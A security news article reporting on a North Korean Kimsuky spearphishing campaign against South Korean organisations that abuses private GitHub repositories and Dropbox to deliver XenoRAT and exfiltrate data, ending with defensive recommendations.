North Korean Hackers Exploit GitHub Infrastructure for Malware Delivery

A sophisticated threat campaign leveraging GitHub’s infrastructure has been attributed to the North Korean state-backed threat group Kimsuky (aka APT43).

Security analysts have uncovered a series of targeted spearphishing attacks against South Korean entities, where private GitHub repositories and Dropbox links serve as primary vehicles for delivering malware including custom versions of XenoRAT and credential-stealing scripts.

Technical Analysis Reveals Kimsuky’s Abuse

The attack chain frequently begins with highly tailored emails, impersonating trustworthy organizations such as South Korean law firms or financial authorities.

PDF documents and PowerShell-based scripts, distributed as malicious email attachments, serve as initial infection vectors.

Upon execution, these scripts download additional payloads from attacker-controlled Dropbox or GitHub repositories.

Notably, the threat actors have hardcoded valid GitHub Personal Access Tokens (PATs) within their malware, enabling seamless access to private repositories without raising suspicion.

Security telemetry indicates the existence of at least five distinct private GitHub repositories (e.g., “hole_311”, “star”, “hole_408”) storing both malware payloads (such as .NET-obfuscated XenoRAT binaries disguised as RTF files) and data exfiltrated from victims.

Some repositories also house decoy documents tailored to the targeted organizations, further enhancing the credibility of spearphishing lures.

Variants of these repositories were observed to manage fileless infections via scheduled tasks, which recurrently fetch and execute PowerShell scripts from GitHub.

The main infostealer writes system and process information to disk and uploads it along with keylogs and clipboard data for select infections into the attackers’ private repositories.

Spearphishing Campaigns Orchestrated

A unique aspect of these operations is the use of “repo-scope” GitHub PATs, granting attackers flexible read/write access to their infrastructure.

Logging analysis revealed systematic uploads from compromised endpoints, test logs originating from both public and private IP addresses, and the reuse of infrastructure across several campaigns dating back to at least March 2025.

The identified C2 architecture is similarly adaptive: the malware can fetch updated payloads from GitHub or Dropbox and contact multiple command-and-control nodes, many of which were linked to known Kimsuky infrastructure.

Advanced obfuscation techniques were employed to hinder reverse engineering, including resource-based string decryption and state machine-based code flow in .NET assemblies.

The identification of GUIDs and mutex names across multiple malware samples enabled researchers to correlate recent activity with previous campaigns, such as the MoonPeak operation further solidifying attribution to Kimsuky.

The technical analysis exposed indicators of compromise (IOCs) spanning malicious scripts, C2 domains, Dropbox distribution URLs, mutex values, and unique email addresses used for repository management.

Examination of spearphishing content, commit logs, and infrastructure elements strongly points to a persistent targeting of South Korean legal, financial, and cryptocurrency-related sectors.

This campaign illustrates a growing trend: North Korean threat actors are increasingly abusing legitimate cloud services particularly developer and file-sharing platforms for both malware delivery and data exfiltration, thereby complicating detection and takedown efforts.

Organizations are urged to monitor for signs of unauthorized repository access, scrutinize email attachments (especially password-protected archives), and enforce strong endpoint controls to detect anomalous PowerShell or scheduled task activity.

Indicators of Compromise (IOC)

Find this Story Interesting! Follow us on LinkedIn and X to Get More Instant updates